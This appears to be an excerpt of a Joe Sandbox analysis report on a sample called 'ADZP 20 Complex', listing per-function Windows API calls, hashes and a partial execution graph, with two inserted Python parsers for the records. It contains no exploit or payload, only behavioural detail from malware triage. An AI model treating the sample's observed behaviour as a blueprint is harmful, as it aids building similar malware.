                    • Instruction Fuzzy Hash: D4F0653A38632137E230215A6C06F57295DC785F71F3542367B247F3D0C5B1680046BD
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • EnterCriticalSection.KERNEL32(?,?,?,00000000,0040A724,00000000,00000001,?,?,?,00000000,0040A54C,?,?,00000000,?), ref: 0040DC13
                    • HeapAlloc.KERNEL32(00000000,-00000018,00000001,?,?,00000000,0040A724,00000000,00000001,?,?,?,00000000,0040A54C,?,?), ref: 0040DCC8
                    • HeapAlloc.KERNEL32(00000000,-00000018,?,?,00000000,0040A724,00000000,00000001,?,?,?,00000000,0040A54C,?,?,00000000), ref: 0040DCEB
                    • LeaveCriticalSection.KERNEL32(?,?,00000000,0040A724,00000000,00000001,?,?,?,00000000,0040A54C,?,?,00000000,?,?), ref: 0040DD43
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: AllocCriticalHeapSection$EnterLeave
                    • String ID:
                    • API String ID: 830345296-0
                    • Opcode ID: 324d660e7cdc21042891890593d34f1f0348325fed707f3f607e68598850c6a9
                    • Instruction ID: 326a62a2d88e17b700e0b5dbbe6d23d3e5727d380a42910b8190cd6cec96877c
                    • Opcode Fuzzy Hash: 324d660e7cdc21042891890593d34f1f0348325fed707f3f607e68598850c6a9
                    • Instruction Fuzzy Hash: D151E570A04B069FD324CF69D980962B7F4FF587103148A3EE49A97A50D338F959CB94
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • wcslen.MSVCRT ref: 0040E7E5
                    • HeapAlloc.KERNEL32(02200000,00000000,0000000A), ref: 0040E809
                    • HeapReAlloc.KERNEL32(02200000,00000000,00000000,0000000A), ref: 0040E82D
                    • HeapFree.KERNEL32(02200000,00000000,00000000,?,?,0040506F,?,0041702E,00401095,00000000), ref: 0040E864
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: Heap$Alloc$Freewcslen
                    • String ID:
                    • API String ID: 2479713791-0
                    • Opcode ID: 2b6b1bd9f026436857951278c42bc1b07c0eea740553c1e91eb77f15f4e50f5e
                    • Instruction ID: 61d70e0538fde6a9b2f408d2d23f17b2afdd03d3414029a6c312abdd158bf447
                    • Opcode Fuzzy Hash: 2b6b1bd9f026436857951278c42bc1b07c0eea740553c1e91eb77f15f4e50f5e
                    • Instruction Fuzzy Hash: 6C2115B5604209EFCB04DF95D884FAAB7B9EB49354F10C169F8099B390D735EA81CB98
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • EnterCriticalSection.KERNEL32(00000020,00000000,?,00000000,0040B455,00000000,?,?,00000000,00403350,00000000,00000000,00000000,00000000,?,00000000), ref: 0040DB23
                    • HeapReAlloc.KERNEL32(00000008,?,?,?,00000000,0040B455,00000000,?,?,00000000,00403350,00000000,00000000,00000000,00000000,?), ref: 0040DB63
                    • LeaveCriticalSection.KERNEL32(00000020,?,00000000,0040B455,00000000,?,?,00000000,00403350,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0040DB9E
                      • Part of subcall function 0040E1F2: HeapAlloc.KERNEL32(00000008,00000000,0040DA6C,00418670,00000014,?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000), ref: 0040E1FE
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: AllocCriticalHeapSection$EnterLeave
                    • String ID:
                    • API String ID: 830345296-0
                    • Opcode ID: 5d9d41e9d09ba23bc41a935226fc724bd5eb564a4c229014a10cb91462bf3418
                    • Instruction ID: 234cd8b738bfcb23ec7c58dff1098e76d365aadfe99366d65fb7203dd4a6e8aa
                    • Opcode Fuzzy Hash: 5d9d41e9d09ba23bc41a935226fc724bd5eb564a4c229014a10cb91462bf3418
                    • Instruction Fuzzy Hash: 6A113D72504710AFC3208F68DC40D56BBFAEB48721B15892EE596E36A0CB34F844CB65
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • EnterCriticalSection.KERNEL32(00000020,?,00000000,00000200,0040E03E,00000000,00000000,?,0040A568,?,00000000,00000200,?,?,0040A46F,00000200), ref: 0040DD6F
                    • HeapFree.KERNEL32(00000000,?,?,00000000,00000200,0040E03E,00000000,00000000,?,0040A568,?,00000000,00000200,?,?,0040A46F), ref: 0040DD86
                    • HeapFree.KERNEL32(00000000,?,?,00000000,00000200,0040E03E,00000000,00000000,?,0040A568,?,00000000,00000200,?,?,0040A46F), ref: 0040DDA2
                    • LeaveCriticalSection.KERNEL32(00000020,?,00000000,00000200,0040E03E,00000000,00000000,?,0040A568,?,00000000,00000200,?,?,0040A46F,00000200), ref: 0040DDBF
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: CriticalFreeHeapSection$EnterLeave
                    • String ID:
                    • API String ID: 1298188129-0
                    • Opcode ID: b3beb58b6f71b40006eb08016dd7c334f266477d507c334884bffe37f11cccde
                    • Instruction ID: 339acd6113cd15283fdaf2d24efa5c6700350868ea18a16039eb98c455fe0077
                    • Opcode Fuzzy Hash: b3beb58b6f71b40006eb08016dd7c334f266477d507c334884bffe37f11cccde
                    • Instruction Fuzzy Hash: 7C012C71A0161ABFC7108F96ED049A7FB78FF49751345817AA804A7664D734E824CFE8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 0040A79A: memset.MSVCRT ref: 0040A802
                      • Part of subcall function 0040DFC6: EnterCriticalSection.KERNEL32(00418684,00000200,00000000,?,0040A568,?,00000000,00000200,?,?,0040A46F,00000200,?,?,?,004010C3), ref: 0040DFDA
                      • Part of subcall function 0040DFC6: HeapFree.KERNEL32(00000000,?,?,0040A568,?,00000000,00000200,?,?,0040A46F,00000200,?,?,?,004010C3,00000004), ref: 0040E028
                      • Part of subcall function 0040DFC6: LeaveCriticalSection.KERNEL32(00418684,?,0040A568,?,00000000,00000200,?,?,0040A46F,00000200,?,?,?,004010C3,00000004,00000015), ref: 0040E02F
                    • HeapFree.KERNEL32(00000000,?,?,00000000,00000200,?,?,0040A46F,00000200,?,?,?,004010C3,00000004,00000015,00000000), ref: 0040A57A
                    • HeapFree.KERNEL32(00000000,?,?,?,0040A46F,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 0040A586
                    • HeapFree.KERNEL32(00000000,?,?,?,?,0040A46F,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200), ref: 0040A59A
                    • HeapFree.KERNEL32(00000000,00000000,?,?,0040A46F,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 0040A5B0
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: FreeHeap$CriticalSection$EnterLeavememset
                    • String ID:
                    • API String ID: 4254243056-0
                    • Opcode ID: 9b91829c39ba2b5ec3bef2853771c0dd8412306e6433636457154be9583086ba
                    • Instruction ID: 62ba4ec21453903b754b53d00370c9fddb20f7a3713721c865cfde946388869e
                    • Opcode Fuzzy Hash: 9b91829c39ba2b5ec3bef2853771c0dd8412306e6433636457154be9583086ba
                    • Instruction Fuzzy Hash: B5F04471105209BFC6125B16DD40C57BF7DFF49798342412AB40463570CB36ED75DBA8
                    Uniqueness

                    Uniqueness Score: -1.00%
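Reading records like the ones above is easier when the argument lists are decoded rather than eyeballed: the first slot 0000FDE9 passed to WideCharToMultiByte is 65001, i.e. CP_UTF8, a TlsGetValue(0000000D) reads TLS slot 13, and HeapAlloc(02200000,00000000,0000000A) is a 10-byte allocation with no flags from the heap handle 0x02200000. The parser below is an added example, not part of the Joe Sandbox report or its tooling; the line layout it assumes (bullet, optional "Part of subcall function" prefix, Api.MODULE, parenthesised hex slots with "?" for unknown values, a "ref:" call-site address) is inferred from the records above and is an assumption. One caveat the decoding has to respect: the lists run to 16 entries even for three-parameter APIs such as HeapAlloc and TlsGetValue, so treat the trailing entries as whatever sat on the caller's stack, not as arguments, and decode only the leading slots.

```python
"""Parse the "APIs" lines of a Joe Sandbox function record into structured
calls and decode a few well-known argument constants.

Added example for reading the records above; it is not part of the Joe
Sandbox report or tooling. The parsing rules are inferred from the visible
line layout and are an assumption."""
import re
from collections import Counter
from dataclasses import dataclass, field
from typing import Optional

# Constructed input: five API lines copied from the records above (the
# bullet and "Part of subcall function" prefixes are kept as they appear).
SAMPLE_LINES = [
    "• WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,?,?,00401218), ref: 00405722",
    "  • Part of subcall function 0040D968: HeapAlloc.KERNEL32(00000008,?,?,00409869,00401DBC,FFFFFFF5,00000200,0000000A,00000000,00000000,FFFFFFF5,00000015,00000001,00000000,00000000,00000000), ref: 0040D98A",
    "• wcslen.MSVCRT ref: 0040E7E5",
    "• HeapAlloc.KERNEL32(02200000,00000000,0000000A), ref: 0040E809",
    "  • Part of subcall function 0040E560: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040E56C",
]

_LINE_RE = re.compile(
    r"^\s*[•*]?\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)

# Documented Win32 constants used when decoding the leading parameters.
HEAP_FLAGS = {0x1: "HEAP_NO_SERIALIZE", 0x4: "HEAP_GENERATE_EXCEPTIONS", 0x8: "HEAP_ZERO_MEMORY"}
CODE_PAGES = {0: "CP_ACP", 1: "CP_OEMCP", 65001: "CP_UTF8"}   # 0xFDE9 == 65001


@dataclass
class ApiCall:
    api: str
    module: str
    args: list                        # int per slot, None where the report shows "?"
    ref: int                          # call-site address from "ref:"
    subcall_of: Optional[int] = None  # set for "Part of subcall function" lines
    decoded: dict = field(default_factory=dict)


def _parse_arg(token: str):
    token = token.strip()
    if token in ("", "?"):
        return None
    return int(token, 16)             # also accepts a leading '-' such as "-00000018"


def decode_args(api: str, args: list) -> dict:
    """Decode only the leading, documented parameters. The report prints up to
    16 stack slots regardless of the real parameter count, so later slots are
    caller stack contents and are deliberately left alone."""
    out = {}
    if api in ("WideCharToMultiByte", "MultiByteToWideChar") and args and args[0] is not None:
        out["CodePage"] = CODE_PAGES.get(args[0], hex(args[0]))
    if api in ("HeapAlloc", "HeapReAlloc", "RtlAllocateHeap") and len(args) > 1 and args[1] is not None:
        names = [name for bit, name in HEAP_FLAGS.items() if args[1] & bit]
        out["dwFlags"] = "|".join(names) if names else "0"
    if api in ("TlsGetValue", "TlsSetValue") and args and args[0] is not None:
        out["dwTlsIndex"] = args[0]
    return out


def parse_api_line(line: str) -> Optional[ApiCall]:
    m = _LINE_RE.match(line)
    if m is None:
        return None                   # headings such as "Strings" or "APIs"
    raw = m.group("args")
    args = [_parse_arg(t) for t in raw.split(",")] if raw is not None else []
    call = ApiCall(
        api=m.group("api"), module=m.group("mod"), args=args,
        ref=int(m.group("ref"), 16),
        subcall_of=int(m.group("sub"), 16) if m.group("sub") else None,
    )
    call.decoded = decode_args(call.api, call.args)
    return call


def parse_record(lines) -> list:
    return [c for c in map(parse_api_line, lines) if c is not None]


def api_histogram(calls) -> Counter:
    """Count 'Api.MODULE' occurrences across one record."""
    return Counter(f"{c.api}.{c.module}" for c in calls)


if __name__ == "__main__":
    for call in parse_record(SAMPLE_LINES):
        print(f"{call.ref:08X} {call.api}.{call.module} {call.decoded}")
```

Feeding a whole report's "APIs" sections through parse_record and api_histogram gives the per-function API mix without the 16-slot noise; extending CODE_PAGES and HEAP_FLAGS, or adding a branch in decode_args for another API, is all that is needed to decode further constants.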

                    Execution Graph

Execution Coverage: 9.9%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 0%
Total number of Nodes: 2000
Total number of Limit Nodes: 80
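The execution_graph listing that follows is the serialized form of the interactive graph: each node is a decimal node id, the code address, and the APIs reached at that node (or "N API calls" for a collapsed subcall), and each edge is written as "source->target"; the extraction has broken the listing across lines at arbitrary token boundaries. The parser below is an added example, not part of the Joe Sandbox report or tooling; its token rules are inferred from the listing and are an assumption. It rebuilds the graph from a short excerpt and answers the question a triager actually asks of it, which nodes are reachable from the entry node and by what path an API such as TlsSetValue is first hit.

```python
"""Parse the serialized execution_graph text that Joe Sandbox emits behind its
graph view and answer reachability questions over it.

Added example, not part of the Joe Sandbox report or tooling. The format is
inferred from the listing: a node is "<decimal id> <hex address> <labels>",
an edge is "<src>-><dst>", and the listing may be broken across lines at any
token boundary. The token rules below are an assumption."""
import re
from collections import deque

# Constructed input: an excerpt of the execution_graph listing, including a
# line break of the kind the extraction introduced.
SAMPLE_GRAPH = """7485 401000 memset GetModuleHandleW HeapCreate 7486 401044 7485->7486 7538 40e4d0 HeapCreate TlsAlloc 7486->7538 7488 401053 7541 40b120 7488->7541 7490 40105d 7544 40a1c0 HeapCreate 7490->7544 7492 40106c 7545 409669 7492->7545 7494 401071 7550 408dee memset InitCommonControlsEx CoInitialize 7494->7550
8031 40ed40 HeapAlloc HeapAlloc TlsSetValue 7538->8031 7540 40e4f7 7540->7488 8032 40dbac HeapAlloc HeapAlloc InitializeCriticalSection 7541->8032 7543 40b12e 7543->7490 7544->7492 8033 40d9d3 7545->8033 7549 409687 InitializeCriticalSection 7549->7494"""

_EDGE_RE = re.compile(r"^(\d+)->(\d+)$")
_ID_RE = re.compile(r"^\d+$")
_ADDR_RE = re.compile(r"^[0-9a-f]{5,8}$")


def parse_graph(text: str):
    """Return (nodes, succ): nodes maps id -> (address, [labels]),
    succ maps id -> [successor ids]."""
    tokens = text.split()             # whitespace is the only separator, so line breaks vanish
    nodes, succ = {}, {}
    current = None
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        edge = _EDGE_RE.match(tok)
        if edge:
            src, dst = int(edge.group(1)), int(edge.group(2))
            succ.setdefault(src, []).append(dst)
            i += 1
            continue
        # A node starts with a decimal id immediately followed by a hex address;
        # "21 API calls" does not qualify because "API" is not an address.
        if _ID_RE.match(tok) and i + 1 < len(tokens) and _ADDR_RE.match(tokens[i + 1]):
            current = int(tok)
            nodes[current] = (int(tokens[i + 1], 16), [])
            i += 2
            continue
        if current is not None:       # any other token labels the current node
            nodes[current][1].append(tok)
        i += 1
    return nodes, succ


def nodes_calling(nodes, api: str):
    """Node ids whose label list names the given API."""
    return sorted(n for n, (_addr, labels) in nodes.items() if api in labels)


def path_to_api(nodes, succ, start: int, api: str):
    """Shortest path (list of node ids) from start to any node labelled api,
    or None if it is unreachable in the parsed excerpt."""
    prev = {start: None}
    queue = deque([start])
    while queue:
        n = queue.popleft()
        if api in nodes.get(n, (0, []))[1]:
            path = []
            while n is not None:
                path.append(n)
                n = prev[n]
            return path[::-1]
        for m in succ.get(n, []):
            if m not in prev:
                prev[m] = n
                queue.append(m)
    return None


def reachable(succ, start: int):
    """All node ids reachable from start by following edges."""
    seen, stack = set(), [start]
    while stack:
        n = stack.pop()
        if n in seen:
            continue
        seen.add(n)
        stack.extend(succ.get(n, []))
    return seen


if __name__ == "__main__":
    nodes, succ = parse_graph(SAMPLE_GRAPH)
    print(len(nodes), "nodes,", sum(len(v) for v in succ.values()), "edges")
    print("path to TlsSetValue:", path_to_api(nodes, succ, 7485, "TlsSetValue"))
```

On the full listing the same calls give the path from the entry node 7485 (address 401000) to any API of interest; a None result on an excerpt only means the connecting edges were not part of the excerpt, so the check is meaningful only on the complete serialization.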
                    execution_graph 10541 401f4c 10542 40e660 21 API calls 10541->10542 10543 401f54 10542->10543 10564 40e520 GetLastError TlsGetValue SetLastError 10543->10564 10545 401f5a 10565 40e520 GetLastError TlsGetValue SetLastError 10545->10565 10547 401f6b 10548 40e6c0 4 API calls 10547->10548 10549 401f73 10548->10549 10566 40e520 GetLastError TlsGetValue SetLastError 10549->10566 10551 401f79 10567 40e520 GetLastError TlsGetValue SetLastError 10551->10567 10553 401f81 10568 40a190 10553->10568 10557 401f8e 10572 405182 TlsGetValue 10557->10572 10559 401f99 10560 408e27 20 API calls 10559->10560 10561 401fa2 10560->10561 10562 4051a0 3 API calls 10561->10562 10563 401fa7 10562->10563 10563->10563 10564->10545 10565->10547 10566->10551 10567->10553 10573 40a120 10568->10573 10571 40e720 TlsGetValue 10571->10557 10572->10559 10574 40a130 10573->10574 10574->10574 10575 40e900 3 API calls 10574->10575 10576 401f88 10575->10576 10576->10571 7485 401000 memset GetModuleHandleW HeapCreate 7486 401044 7485->7486 7538 40e4d0 HeapCreate TlsAlloc 7486->7538 7488 401053 7541 40b120 7488->7541 7490 40105d 7544 40a1c0 HeapCreate 7490->7544 7492 40106c 7545 409669 7492->7545 7494 401071 7550 408dee memset InitCommonControlsEx CoInitialize 7494->7550 7496 401076 7551 4053b5 InitializeCriticalSection 7496->7551 7498 40107b 7552 405068 7498->7552 7502 4010c3 7555 40aa5a 7502->7555 7506 4010e9 7507 40aa5a 16 API calls 7506->7507 7508 4010f4 7507->7508 7509 40a9c8 13 API calls 7508->7509 7510 40110f 7509->7510 7566 40e266 7510->7566 7512 40112d 7513 405068 4 API calls 7512->7513 7514 40113d 7513->7514 7515 40aa5a 16 API calls 7514->7515 7516 401148 7515->7516 7517 40a9c8 13 API calls 7516->7517 7518 401163 SetConsoleCtrlHandler 7517->7518 7572 409fb0 7518->7572 7520 401180 7578 40e520 GetLastError TlsGetValue SetLastError 7520->7578 7522 401186 7579 402eed 7522->7579 7526 401197 7604 401ba0 7526->7604 7529 4011a7 7900 402fad 7529->7900 7530 4011ac 7711 403f53 7530->7711 
8031 40ed40 HeapAlloc HeapAlloc TlsSetValue 7538->8031 7540 40e4f7 7540->7488 8032 40dbac HeapAlloc HeapAlloc InitializeCriticalSection 7541->8032 7543 40b12e 7543->7490 7544->7492 8033 40d9d3 7545->8033 7549 409687 InitializeCriticalSection 7549->7494 7550->7496 7551->7498 8045 40e7d0 7552->8045 7554 401095 GetStdHandle 7885 40a460 7554->7885 7556 40aa63 7555->7556 7557 4010ce 7555->7557 8052 40ab16 7556->8052 7895 40a9c8 HeapAlloc 7557->7895 7561 40aaa0 7563 40aab3 HeapFree 7561->7563 7564 40aaa7 HeapFree 7561->7564 7563->7557 7564->7563 7565 40aa8e HeapFree 7565->7561 7565->7565 8096 40e3b9 7566->8096 7569 40e283 RtlAllocateHeap 7570 40e2a2 memset 7569->7570 7571 40e2e6 7569->7571 7570->7571 7571->7512 7573 40a0d0 7572->7573 7574 40a0d8 7573->7574 7575 40a0fa SetUnhandledExceptionFilter 7573->7575 7576 40a0e1 SetUnhandledExceptionFilter 7574->7576 7577 40a0eb SetUnhandledExceptionFilter 7574->7577 7575->7520 7576->7577 7577->7520 7578->7522 8102 40e660 7579->8102 7583 402f02 8117 40e520 GetLastError TlsGetValue SetLastError 7583->8117 7585 402f57 8118 40e520 GetLastError TlsGetValue SetLastError 7585->8118 7587 402f5f 8119 40e520 GetLastError TlsGetValue SetLastError 7587->8119 7589 402f67 8120 40e520 GetLastError TlsGetValue SetLastError 7589->8120 7591 402f6f 8121 40d7a0 7591->8121 7595 402f8a 8126 405eb0 7595->8126 7597 402f92 8136 405170 TlsGetValue 7597->8136 7599 40118d 7600 40e560 TlsGetValue 7599->7600 7601 40e5a6 RtlReAllocateHeap 7600->7601 7602 40e589 RtlAllocateHeap 7600->7602 7603 40e5c7 7601->7603 7602->7603 7603->7526 7605 40e660 21 API calls 7604->7605 7606 401baf 7605->7606 8161 40e520 GetLastError TlsGetValue SetLastError 7606->8161 7608 401bb5 8162 40e520 GetLastError TlsGetValue SetLastError 7608->8162 7610 401bc7 8163 40e520 GetLastError TlsGetValue SetLastError 7610->8163 7612 401bcf 8164 409698 7612->8164 7616 401bdb LoadLibraryExW 7617 4051a0 3 API calls 7616->7617 7618 401be8 EnumResourceTypesW FreeLibrary 7617->7618 7636 401c13 
7618->7636 7619 401cb1 7620 40ab16 4 API calls 7619->7620 7621 401cbc 7620->7621 8172 40e520 GetLastError TlsGetValue SetLastError 7621->8172 7623 40e6c0 wcslen TlsGetValue RtlReAllocateHeap HeapReAlloc 7623->7636 7624 401cc2 8173 40e520 GetLastError TlsGetValue SetLastError 7624->8173 7626 401cca 8174 40e520 GetLastError TlsGetValue SetLastError 7626->8174 7628 401cd2 8175 40e520 GetLastError TlsGetValue SetLastError 7628->8175 7630 40e520 GetLastError TlsGetValue SetLastError 7630->7636 7631 401cda 8176 40e520 GetLastError TlsGetValue SetLastError 7631->8176 7633 401ce7 8177 40e520 GetLastError TlsGetValue SetLastError 7633->8177 7635 401cef 8178 405e10 7635->8178 7636->7619 7636->7623 7636->7630 7638 40e560 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 7636->7638 7680 401e27 7636->7680 7638->7636 7641 401cff 8187 40d780 7641->8187 7645 401d0c 7646 405eb0 6 API calls 7645->7646 7647 401d14 7646->7647 7648 40e560 3 API calls 7647->7648 7649 401d1e 7648->7649 8191 40e520 GetLastError TlsGetValue SetLastError 7649->8191 7651 401d28 8192 40e6c0 7651->8192 7653 401d30 7654 40e560 3 API calls 7653->7654 7655 401d3a 7654->7655 8197 40e520 GetLastError TlsGetValue SetLastError 7655->8197 7657 401d40 8198 40e520 GetLastError TlsGetValue SetLastError 7657->8198 7659 401d48 8199 40e520 GetLastError TlsGetValue SetLastError 7659->8199 7661 401d50 8200 40e520 GetLastError TlsGetValue SetLastError 7661->8200 7663 401d58 7664 40d780 8 API calls 7663->7664 7665 401d68 7664->7665 8201 405182 TlsGetValue 7665->8201 7667 401d6d 7668 405eb0 6 API calls 7667->7668 7669 401d75 7668->7669 7670 40e560 3 API calls 7669->7670 7671 401d7f 7670->7671 8202 40e520 GetLastError TlsGetValue SetLastError 7671->8202 7673 401d85 8203 40e520 GetLastError TlsGetValue SetLastError 7673->8203 7675 401d8d 8204 405f20 7675->8204 7677 401d9d 7678 40e560 3 API calls 7677->7678 7679 401da7 7678->7679 7679->7680 8212 40985e 7679->8212 7683 401e23 7685 40e5f0 RtlFreeHeap 7683->7685 7688 401e3c 7685->7688 
7686 401dc6 8218 40e520 GetLastError TlsGetValue SetLastError 7686->8218 7690 40e5f0 RtlFreeHeap 7688->7690 7689 401dce 8219 409872 7689->8219 7692 401e45 7690->7692 7694 40e5f0 RtlFreeHeap 7692->7694 7696 401e4e 7694->7696 7697 40e5f0 RtlFreeHeap 7696->7697 7699 401e57 7697->7699 7698 401ddf 8229 405160 7698->8229 7701 40e5f0 RtlFreeHeap 7699->7701 7702 40119c 7701->7702 7702->7529 7702->7530 7703 401dea 7703->7683 8232 40e520 GetLastError TlsGetValue SetLastError 7703->8232 7705 401e03 8233 40e520 GetLastError TlsGetValue SetLastError 7705->8233 7707 401e0b 7708 409872 21 API calls 7707->7708 7709 401e17 7708->7709 7710 40e560 3 API calls 7709->7710 7710->7683 7712 403f59 7711->7712 7712->7712 7713 40e660 21 API calls 7712->7713 7729 403f6b 7713->7729 7714 40e520 GetLastError TlsGetValue SetLastError 7739 403fec 7714->7739 7715 405dc0 3 API calls 7715->7729 7716 40e560 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 7716->7729 7717 405dc0 3 API calls 7717->7739 7718 40e520 GetLastError TlsGetValue SetLastError 7730 40406d 7718->7730 7719 40e520 GetLastError TlsGetValue SetLastError 7719->7729 7720 40e560 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 7720->7739 7721 405dc0 3 API calls 7721->7730 7722 405dc0 3 API calls 7724 4040ee 7722->7724 7723 40e520 GetLastError TlsGetValue SetLastError 7731 40416f 7723->7731 7724->7722 7724->7731 7735 40e520 GetLastError TlsGetValue SetLastError 7724->7735 7747 40e6c0 wcslen TlsGetValue RtlReAllocateHeap HeapReAlloc 7724->7747 7754 40e560 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 7724->7754 7725 40e6c0 wcslen TlsGetValue RtlReAllocateHeap HeapReAlloc 7725->7729 7727 40e520 GetLastError TlsGetValue SetLastError 7740 4041f0 7727->7740 7728 40e520 GetLastError TlsGetValue SetLastError 7732 404275 7728->7732 7729->7715 7729->7716 7729->7719 7729->7725 7729->7739 7730->7718 7730->7721 7730->7724 7734 40e6c0 wcslen TlsGetValue RtlReAllocateHeap HeapReAlloc 7730->7734 7752 40e560 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 
9343->9339 9343->9340 9346 40e900 3 API calls 9344->9346 9348 4058f0 9346->9348 9347 4058d7 memmove 9347->9344 9349 405901 9348->9349 9350 4058f6 wcsncpy 9348->9350 9349->8449 9350->9349 9351->8451 9352->8453 9353->8455 9354->8459 9355->8461 9435 408e58 9356->9435 9358 408f81 9359 408e58 3 API calls 9358->9359 9360 408f90 9359->9360 9361 408e58 3 API calls 9360->9361 9362 408fa3 9361->9362 9363 408fb0 GetStockObject 9362->9363 9364 408fbd LoadIconW LoadCursorW RegisterClassExW 9362->9364 9363->9364 9439 4094d1 GetForegroundWindow 9364->9439 9369 409047 IsWindowEnabled 9370 40906b 9369->9370 9371 409052 EnableWindow 9369->9371 9372 4094d1 3 API calls 9370->9372 9371->9370 9373 40907e GetSystemMetrics GetSystemMetrics CreateWindowExW 9372->9373 9374 4092ba 9373->9374 9375 4090cb SetWindowLongW CreateWindowExW SendMessageW 9373->9375 9376 4092cd 9374->9376 9453 40e9e0 TlsGetValue 9374->9453 9377 409125 9375->9377 9378 409128 CreateWindowExW SendMessageW SetFocus 9375->9378 9454 408e9a 9376->9454 9377->9378 9380 4091a5 CreateWindowExW SendMessageW CreateAcceleratorTableW SetForegroundWindow BringWindowToTop 9378->9380 9381 40917b SendMessageW wcslen wcslen SendMessageW 9378->9381 9384 40926a 9380->9384 9381->9380 9386 409273 9384->9386 9387 40922e GetMessageW 9384->9387 9385 408e9a HeapFree 9388 4092df 9385->9388 9390 409277 DestroyAcceleratorTable 9386->9390 9391 40927e 9386->9391 9387->9386 9389 409243 TranslateAcceleratorW 9387->9389 9392 408e9a HeapFree 9388->9392 9389->9384 9393 409254 TranslateMessage DispatchMessageW 9389->9393 9390->9391 9391->9374 9394 409285 wcslen 9391->9394 9395 4092e5 9392->9395 9393->9384 9396 40e900 3 API calls 9394->9396 9395->8463 9397 40929c wcscpy HeapFree 9396->9397 9397->9374 9398->8470 9399->8472 9400->8474 9401->8476 9402->8480 9403->8487 9404->8489 9405->8491 9406->8495 9407->8497 9409 4094d1 3 API calls 9408->9409 9410 408e2d 9409->9410 9411 409588 16 API calls 9410->9411 9412 408e36 MessageBoxW 9411->9412 9413 409588 16 API 
